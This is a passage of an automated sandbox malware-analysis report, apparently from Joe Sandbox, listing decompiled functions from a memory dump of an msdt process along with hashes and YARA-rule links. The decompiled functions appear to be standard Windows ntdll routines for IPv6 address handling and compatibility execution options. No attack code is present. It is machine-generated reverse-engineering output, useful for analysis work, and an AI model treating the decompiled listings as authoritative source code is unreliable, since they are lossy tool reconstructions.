                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 402402107-258546922
                                                                    • Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                                                    • Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
                                                                    • Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                                                    • Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025D13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 38%
                                                                    			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2592926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2599cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E025C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E025C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                    0x025d13d5
                                                                    0x025d13d9
                                                                    0x025d13dc
                                                                    0x025d13de
                                                                    0x025d13e1
                                                                    0x025d13e8
                                                                    0x025d13ee
                                                                    0x025fe8fd
                                                                    0x00000000
                                                                    0x025fe921
                                                                    0x025fe921
                                                                    0x025fe928
                                                                    0x025fe982
                                                                    0x025fe98a
                                                                    0x00000000
                                                                    0x025fe99a
                                                                    0x025fe99e
                                                                    0x025fe9a3
                                                                    0x025fe9a8
                                                                    0x025fe9b9
                                                                    0x025fe978
                                                                    0x00000000
                                                                    0x025fe978
                                                                    0x025fe98a
                                                                    0x025fe92a
                                                                    0x025fe931
                                                                    0x025fe944
                                                                    0x025fe944
                                                                    0x025fe950
                                                                    0x025fe954
                                                                    0x025fe959
                                                                    0x025fe95e
                                                                    0x025fe963
                                                                    0x025fe970
                                                                    0x00000000
                                                                    0x025fe975
                                                                    0x025fe93b
                                                                    0x025fe980
                                                                    0x00000000
                                                                    0x025fe980
                                                                    0x025fe942
                                                                    0x025fe94b
                                                                    0x00000000
                                                                    0x025fe94b
                                                                    0x00000000
                                                                    0x025fe942
                                                                    0x025d13f4
                                                                    0x025d13f4
                                                                    0x025d13f9
                                                                    0x025d13fc
                                                                    0x025d13ff
                                                                    0x025d1406
                                                                    0x025fe9cc
                                                                    0x025fe9d2
                                                                    0x025fe9d2
                                                                    0x025fe9cc
                                                                    0x025d140c
                                                                    0x025d1411
                                                                    0x025d1431
                                                                    0x025d143a
                                                                    0x025d143c
                                                                    0x025d143f
                                                                    0x025d143f
                                                                    0x025d1442
                                                                    0x025d1447
                                                                    0x025d14a8
                                                                    0x025d14ac
                                                                    0x025fe9e2
                                                                    0x025fe9e7
                                                                    0x025fe9ec
                                                                    0x025fea05
                                                                    0x025fea05
                                                                    0x00000000
                                                                    0x025d1449
                                                                    0x00000000
                                                                    0x025d1449
                                                                    0x025d144c
                                                                    0x025d1459
                                                                    0x025d1462
                                                                    0x025d1469
                                                                    0x025d146a
                                                                    0x025d1470
                                                                    0x025d1473
                                                                    0x025d1476
                                                                    0x025d1476
                                                                    0x025d1490
                                                                    0x025d1495
                                                                    0x025d138e
                                                                    0x025d1390
                                                                    0x025d1397
                                                                    0x025d1398
                                                                    0x025d1399
                                                                    0x025d13a1
                                                                    0x025d13a4
                                                                    0x025d13a4
                                                                    0x025d1498
                                                                    0x025d149c
                                                                    0x025d149f
                                                                    0x025d14a2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d14a4
                                                                    0x00000000
                                                                    0x025d14a4
                                                                    0x025d1413
                                                                    0x025d1415
                                                                    0x025d1416
                                                                    0x025d1419
                                                                    0x025d141c
                                                                    0x025d1422
                                                                    0x025d13b7
                                                                    0x025d13bc
                                                                    0x025d13bf
                                                                    0x025d13bf
                                                                    0x025d13c2
                                                                    0x025d1424
                                                                    0x025d1424
                                                                    0x025d1424
                                                                    0x025d1427
                                                                    0x025d142b
                                                                    0x025d142c
                                                                    0x025d142c
                                                                    0x025d142c
                                                                    0x00000000
                                                                    0x025d141c
                                                                    0x025d1411

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                                                    • Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
                                                                    • Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                                                    • Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025C7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E025C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2672088; // 0x762a3ac1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0259DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E025A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E025A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0260E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E025E3F92();
					_t38 = 1;
					L2:
					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                    0x025c7f08
                                                                    0x025c7f0f
                                                                    0x025c7f12
                                                                    0x025c7f1b
                                                                    0x025c7f31
                                                                    0x025e3ead
                                                                    0x025e3eb4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e3eba
                                                                    0x025e3ecd
                                                                    0x025e3ed2
                                                                    0x025e3ee1
                                                                    0x025e3ee7
                                                                    0x025e3eec
                                                                    0x025e3f12
                                                                    0x025e3f18
                                                                    0x025e3f1a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e3f20
                                                                    0x025e3f26
                                                                    0x025e3f28
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e3f2e
                                                                    0x025e3f30
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e3f3a
                                                                    0x025e3f3b
                                                                    0x025e3f53
                                                                    0x025e3f64
                                                                    0x025e3f69
                                                                    0x025e3f6c
                                                                    0x025e3f6d
                                                                    0x025e3f6f
                                                                    0x025ee304
                                                                    0x025ee30f
                                                                    0x025ee315
                                                                    0x025ee31e
                                                                    0x025ee321
                                                                    0x025ee327
                                                                    0x025ee329
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025ee32f
                                                                    0x025ee32f
                                                                    0x025ee337
                                                                    0x025ee33a
                                                                    0x025ee33b
                                                                    0x025ee33d
                                                                    0x025ee33f
                                                                    0x025ee341
                                                                    0x025ee341
                                                                    0x025ee34e
                                                                    0x025ee353
                                                                    0x025ee358
                                                                    0x025ee35d
                                                                    0x025ee35f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025ee365
                                                                    0x025ee365
                                                                    0x025ee368
                                                                    0x025ee36e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025ee374
                                                                    0x025ee32f
                                                                    0x025e3f75
                                                                    0x025e3f7a
                                                                    0x025e3f7c
                                                                    0x025e3f7e
                                                                    0x025e3f86
                                                                    0x025c7f39
                                                                    0x025c7f47
                                                                    0x025c7f47
                                                                    0x025c7f37
                                                                    0x025c7f37
                                                                    0x00000000

                                                                    APIs
                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12
                                                                    Strings
                                                                    • Execute=1, xrefs: 025E3F5E
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
                                                                    • ExecuteOptions, xrefs: 025E3F04
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: BaseDataModuleQuery
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 3901378454-484625025
                                                                    • Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                                                    • Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
                                                                    • Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                                                    • Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025D0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E025D0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E025D0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E025D0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E025D0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                    0x025d0b21
                                                                    0x025d0b24
                                                                    0x025d0b27
                                                                    0x025d0b2a
                                                                    0x025d0b2d
                                                                    0x025d0b30
                                                                    0x025d0b33
                                                                    0x025d0b36
                                                                    0x025d0b39
                                                                    0x025d0b3e
                                                                    0x025d0c65
                                                                    0x025d0c68
                                                                    0x025d0c6a
                                                                    0x025d0c6f
                                                                    0x025feb42
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feb48
                                                                    0x025feb48
                                                                    0x025d0c75
                                                                    0x025d0c7a
                                                                    0x025feb54
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feb5a
                                                                    0x025d0c80
                                                                    0x025d0c84
                                                                    0x025feb98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feba6
                                                                    0x025d0cb8
                                                                    0x025d0cba
                                                                    0x025d0cd3
                                                                    0x025d0cda
                                                                    0x025d0ce4
                                                                    0x025d0ce9
                                                                    0x00000000
                                                                    0x025d0cec
                                                                    0x025d0c8c
                                                                    0x025feb63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feb70
                                                                    0x025feb75
                                                                    0x025feb7d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feb8c
                                                                    0x00000000
                                                                    0x025feb8c
                                                                    0x025d0c96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0ca2
                                                                    0x025d0cac
                                                                    0x025d0cb4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0b44
                                                                    0x025d0b47
                                                                    0x025d0b49
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0b4f
                                                                    0x025d0b50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0b56
                                                                    0x025d0b62
                                                                    0x025d0b7c
                                                                    0x025d0bac
                                                                    0x025d0a0f
                                                                    0x025feaaa
                                                                    0x00000000
                                                                    0x025feac4
                                                                    0x025feac4
                                                                    0x025d0bd0
                                                                    0x025d0bd0
                                                                    0x025d0bd4
                                                                    0x025d0bd9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0bdb
                                                                    0x025d0be0
                                                                    0x025feb0e
                                                                    0x025d0a1a
                                                                    0x00000000
                                                                    0x025d0a1a
                                                                    0x025feb1a
                                                                    0x025feb1f
                                                                    0x025feb27
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feb36
                                                                    0x00000000
                                                                    0x025feb36
                                                                    0x025d0bea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0bf6
                                                                    0x025d0c00
                                                                    0x025d0c03
                                                                    0x025d0c0b
                                                                    0x00000000
                                                                    0x025d0c0b
                                                                    0x025feaaa
                                                                    0x00000000
                                                                    0x025d0a15
                                                                    0x025d0bb6
                                                                    0x00000000
                                                                    0x025d0bc6
                                                                    0x025d0bc6
                                                                    0x025d0bcb
                                                                    0x025d0c15
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0c1d
                                                                    0x025d0c20
                                                                    0x025d0c21
                                                                    0x025d0c24
                                                                    0x025d0c24
                                                                    0x025d0c26
                                                                    0x00000000
                                                                    0x025d0c26
                                                                    0x025d0bcd
                                                                    0x00000000
                                                                    0x025d0bcd
                                                                    0x025d0b89
                                                                    0x025d0b89
                                                                    0x025d0b90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0b96
                                                                    0x00000000
                                                                    0x025d0b96
                                                                    0x025d0a04
                                                                    0x025d0a04
                                                                    0x025d0b9a
                                                                    0x025d0b9a
                                                                    0x025d0b9b
                                                                    0x025d0b9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0ba5
                                                                    0x025d0ac7
                                                                    0x025d0aca
                                                                    0x025feacf
                                                                    0x00000000
                                                                    0x025feade
                                                                    0x025feade
                                                                    0x025feae3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feaf3
                                                                    0x025feaf6
                                                                    0x025feaf7
                                                                    0x025feafe
                                                                    0x025feb01
                                                                    0x00000000
                                                                    0x025feb01
                                                                    0x025feacf
                                                                    0x025d0ad0
                                                                    0x025d0ad4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0ada
                                                                    0x025d0ae6
                                                                    0x025d0c34
                                                                    0x00000000
                                                                    0x025d0c47
                                                                    0x025d0c49
                                                                    0x025d0c4a
                                                                    0x025d0c4e
                                                                    0x025d0c51
                                                                    0x025d0c54
                                                                    0x025d0c57
                                                                    0x025d0c5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025d0c60
                                                                    0x025d0afb
                                                                    0x025d0afe
                                                                    0x025d0b02
                                                                    0x025d0b05
                                                                    0x025d0b08
                                                                    0x00000000
                                                                    0x025d0b08
                                                                    0x025d0ae6
                                                                    0x025d0b44
                                                                    0x025d09f8
                                                                    0x025d09f8
                                                                    0x025d09f9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feaa0
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: __fassign
                                                                    • String ID: .$:$:
                                                                    • API String ID: 3965848254-2308638275
                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                    • Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                    • Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025D0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 49%
                                                                    			E025D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
